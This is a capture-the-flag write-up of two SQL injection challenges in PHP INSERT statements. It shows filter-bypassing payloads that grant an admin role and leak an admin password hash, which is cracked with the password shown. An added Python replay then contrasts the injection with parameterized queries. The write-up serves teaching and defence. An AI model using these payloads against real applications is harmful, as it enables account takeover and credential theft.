beast: INSERT query injection

Here you could register and would get guest status; admin was needed for the flag.

Here is the important snippet of the registration code:

// phone must be shorter than 20 characters
if(strlen($_POST[phone])>=20) exit("Access Denied");
// id may not contain "admin" (case-insensitive)
if(eregi("admin",$_POST[id])) exit("Access Denied");
// phone is checked against a keyword blacklist, but quotes, parentheses and "--" are not on it
if(eregi("load|admin|0x|#|hex|char|ascii|ord|from|select|union|infor|challenge",$_POST[phone])) exit("Access Denied");

// id is quoted, phone is interpolated unquoted, the third column is the role
@mysql_query("insert into challenge4 values('$_POST[id]',$_POST[phone],'guest')");

So, id was filtered for "admin", and phone had to be under 20 chars and free of the blacklisted keywords. Took me quite long to get this one, but the solution is simple:

id=nimda
**phone=1,reverse(id))--%0a**

making the query:

insert into challenge4 values('nimda',1,reverse(id))-- ,'guest')

Two MySQL details make this work. A `--` comment only starts when whitespace follows it, which is what the trailing `%0a` (newline) provides, so the original `,'guest')` is commented out. And an expression in a VALUES list may refer to a column already set in the same row, so reverse(id) is reverse('nimda') = 'admin': the string "admin" never appears in either parameter, so neither filter sees it, yet it lands in the role column.

Now log in as "nimda" with phone "1" and you get the flag ^^ pretty nice one!


yhsj: INSERT query injection

if(eregi("update|set|union|#|char|ascii|hex|infor|mysql|\.|load",$_POST[tm])) exit("<center><font color=brown>Access Denied</font></center>");
@mysql_query("insert into talk_msg values(1,'$_SESSION[id]','$ck[id]','$_POST[msg]',$_POST[tm])");

$_POST[tm] was the entry point: tm is interpolated unquoted as the last value, and the blacklist blocks neither select/from nor parentheses, so submit something like

**1),(1,0x706c6974,0x706c6974,(select pw from talk where id=0x61646d696e),1**

making the query

insert into talk_msg values(1,'plit','plit','blablabla',1),(1,0x706c6974,0x706c6974,(select pw from talk where id=0x61646d696e),1)

Now the admin's hash is in your message (the second row of the multi-row VALUES carries the subquery result in the msg column, with you as sender and receiver). It was salted like md5('zombie_$pw'), so I used hashcat + dictionaries to crack it, getting zombie_hellsonic. Log in as admin:zombie_hellsonic and get the flag.
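The mechanics of the yhsj injection, as an added example that is not part of the original write-up or the challenge's code: it replays the blacklist from the page, runs the unquoted-parameter INSERT against a constructed SQLite schema (tables and hashes are made up here; the admin hash follows the md5('zombie_$pw') scheme the write-up describes), and runs the same payload through a parameterized version of the statement. One difference from the page's payload is deliberate: MySQL reads 0x706c6974 as the string 'plit', while SQLite reads it as an integer, so the strings are quoted here instead (quotes are not on the blacklist either). The beast challenge is not replayed because its reverse(id) trick relies on MySQL letting a VALUES expression reference a column set earlier in the same row, which SQLite does not support.

```python
import hashlib
import re
import sqlite3

# Blacklist from the challenge's eregi() call, as a case-insensitive Python regex.
BLACKLIST = re.compile(r"update|set|union|#|char|ascii|hex|infor|mysql|\.|load",
                       re.IGNORECASE)

# Constructed admin credential using the salting scheme the write-up describes.
ADMIN_HASH = hashlib.md5(b"zombie_hellsonic").hexdigest()

# Same shape as the page's payload: close the first row, open a second one whose
# message column is a subquery. Strings are quoted because SQLite treats 0x... as
# an integer, unlike MySQL (quotes are not blacklisted either).
PAYLOAD = "1),(1,'plit','plit',(select pw from talk where id='admin'),1"


def passes_filter(tm: str) -> bool:
    """True when the challenge's keyword blacklist would let tm through."""
    return BLACKLIST.search(tm) is None


def fresh_db() -> sqlite3.Connection:
    """Constructed schema: a users table plus the message table the INSERT targets."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE talk (id TEXT PRIMARY KEY, pw TEXT);
        CREATE TABLE talk_msg (kind INTEGER, sender TEXT, receiver TEXT, msg TEXT, tm TEXT);
    """)
    db.execute("INSERT INTO talk VALUES ('admin', ?)", (ADMIN_HASH,))
    db.execute("INSERT INTO talk VALUES ('plit', ?)",
               (hashlib.md5(b"zombie_guest").hexdigest(),))
    db.commit()
    return db


def vulnerable_insert(db, session_id, ck_id, msg, tm):
    """Mirrors the page's mysql_query(): tm is interpolated unquoted, so whatever
    follows the first value list is parsed as SQL."""
    query = f"insert into talk_msg values(1,'{session_id}','{ck_id}','{msg}',{tm})"
    db.execute(query)
    db.commit()
    return query


def safe_insert(db, session_id, ck_id, msg, tm):
    """Same statement with bound parameters: tm is stored as data, never parsed."""
    db.execute("insert into talk_msg values(1,?,?,?,?)", (session_id, ck_id, msg, tm))
    db.commit()


def readable_messages(db, user):
    """Message bodies the given user can read back, i.e. the channel the leak uses."""
    return [r[0] for r in db.execute(
        "select msg from talk_msg where sender = ? or receiver = ? order by rowid",
        (user, user))]


def run(use_safe: bool):
    """Insert the payload as user 'plit' and report (row count, messages plit can read)."""
    db = fresh_db()
    insert = safe_insert if use_safe else vulnerable_insert
    insert(db, "plit", "plit", "blablabla", PAYLOAD)
    rows = db.execute("select count(*) from talk_msg").fetchone()[0]
    return rows, readable_messages(db, "plit")


if __name__ == "__main__":
    print("payload passes blacklist:", passes_filter(PAYLOAD))
    print("vulnerable:", run(use_safe=False))   # 2 rows, admin hash among the messages
    print("parameterized:", run(use_safe=True)) # 1 row, payload stored as plain text in tm
```

The vulnerable path ends with two rows in talk_msg and the admin hash readable as plit's own message; the parameterized path stores the entire payload as the tm value of a single row. Extending the blacklist would not have helped, since the payload already avoids every listed keyword; binding the parameter is what removes the attacker's control over the statement.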